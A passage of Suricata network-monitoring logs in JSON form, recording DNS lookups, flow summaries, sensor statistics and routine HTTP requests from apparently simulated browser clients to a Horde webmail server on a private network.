usy":0,"rows_maxlen":1},"dns":{"memuse":22818,"memcap_state":0,"memcap_global":0},"http":{"memuse":74797,"memcap":0}}} {"timestamp":"2020-02-29T00:05:17.000247+0000","flow_id":859219642302663,"event_type":"flow","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:16.606407+0000","end":"2020-02-29T00:00:16.717444+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.000715+0000","flow_id":1375826898671631,"event_type":"flow","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:17.808975+0000","end":"2020-02-29T00:00:17.914037+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:18.458620+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34740,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":16766,"tx_id":0}} {"timestamp":"2020-02-29T00:05:22.000735+0000","event_type":"stats","stats":{"uptime":13974,"capture":{"kernel_packets":133419,"kernel_drops":0},"decoder":{"pkts":133419,"bytes":92364099,"invalid":181,"ipv4":131974,"ipv6":8,"ethernet":133419,"raw":0,"null":0,"sll":0,"tcp":126891,"udp":4888,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2700,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2716,"synack":2707,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1743,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2228,"failed_udp":110},"tx":{"http":4524,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2305}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":39940,"memcap":0}}} {"timestamp":"2020-02-29T00:05:23.000408+0000","flow_id":568154018685187,"event_type":"flow","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":3325,"bytes_toclient":14106,"start":"2020-02-29T00:04:06.663811+0000","end":"2020-02-29T00:04:22.205376+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:23.472786+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41142,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35915,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:23.581640+0000","flow_id":374562667837138,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41142,"proto":"UDP","dns":{"type":"answer","id":35915,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:23.743422+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34742,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:05:28.745767+0000","flow_id":83501324109156,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34742,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35877,"tx_id":0}} {"timestamp":"2020-02-29T00:05:29.000140+0000","event_type":"stats","stats":{"uptime":13981,"capture":{"kernel_packets":133423,"kernel_drops":0},"decoder":{"pkts":133438,"bytes":92373299,"invalid":181,"ipv4":131993,"ipv6":8,"ethernet":133438,"raw":0,"null":0,"sll":0,"tcp":126908,"udp":4890,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2701,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2717,"synack":2708,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1744,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2229,"failed_udp":110},"tx":{"http":4525,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2306}},"flow_mgr":{"closed_pruned":2681,"new_pruned":15,"est_pruned":2270,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22488,"memcap_state":0,"memcap_global":0},"http":{"memuse":69495,"memcap":0}}} {"timestamp":"2020-02-29T00:05:29.001158+0000","flow_id":1313463988770583,"event_type":"flow","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":34,"pkts_toclient":37,"bytes_toserver":4254,"bytes_toclient":39885,"start":"2020-02-29T00:04:09.251671+0000","end":"2020-02-29T00:04:28.151570+0000","age":19,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:29.002872+0000","flow_id":1115796709773253,"event_type":"flow","src_ip":"192.168.10.81","src_port":52682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10025,"start":"2020-02-29T00:04:23.528325+0000","end":"2020-02-29T00:04:28.933275+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:29.640045+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51580,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43519,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:29.748633+0000","flow_id":893553631413293,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51580,"proto":"UDP","dns":{"type":"answer","id":43519,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.304068+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343}} {"timestamp":"2020-02-29T00:05:30.445906+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24343},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:05:30.454866+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33976,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4505,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.563509+0000","flow_id":1021062620573906,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33976,"proto":"UDP","dns":{"type":"answer","id":4505,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:05:30.623204+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.655250+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1656,"tx_id":1}} {"timestamp":"2020-02-29T00:05:30.670217+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41347,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43045,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.778890+0000","flow_id":113437246634505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41347,"proto":"UDP","dns":{"type":"answer","id":43045,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.841339+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60298,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38798,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:30.949739+0000","flow_id":214948798715515,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60298,"proto":"UDP","dns":{"type":"answer","id":38798,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:05:30.985302+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592}} {"timestamp":"2020-02-29T00:05:31.023880+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:05:32.000208+0000","flow_id":987695000028206,"event_type":"flow","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:31.230446+0000","end":"2020-02-29T00:00:31.336274+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:35.986970+0000","flow_id":893085479963979,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34744,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":592},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1378,"tx_id":2}} {"timestamp":"2020-02-29T00:05:35.990066+0000","flow_id":263627957994143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34746,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:05:36.000258+0000","event_type":"stats","stats":{"uptime":13988,"capture":{"kernel_packets":133488,"kernel_drops":0},"decoder":{"pkts":133497,"bytes":92407732,"invalid":181,"ipv4":132052,"ipv6":8,"ethernet":133497,"raw":0,"null":0,"sll":0,"tcp":126959,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2683,"new_pruned":15,"est_pruned":2271,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} {"timestamp":"2020-02-29T00:05:38.000700+0000","flow_id":1694633747830855,"event_type":"flow","src_ip":"192.168.10.130","src_port":34732,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:04:32.088135+0000","end":"2020-02-29T00:04:37.456773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:38.003807+0000","flow_id":243338513312687,"event_type":"flow","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:37.879535+0000","end":"2020-02-29T00:00:37.984947+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:41.000331+0000","flow_id":738608386810466,"event_type":"flow","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":19,"bytes_toserver":2955,"bytes_toclient":14491,"start":"2020-02-29T00:04:22.205410+0000","end":"2020-02-29T00:04:40.307386+0000","age":18,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:42.416658+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50875,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":50574,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:42.525766+0000","flow_id":1628697414491026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50875,"proto":"UDP","dns":{"type":"answer","id":50574,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:42.586343+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:05:42.651930+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:05:42.653306+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581}} 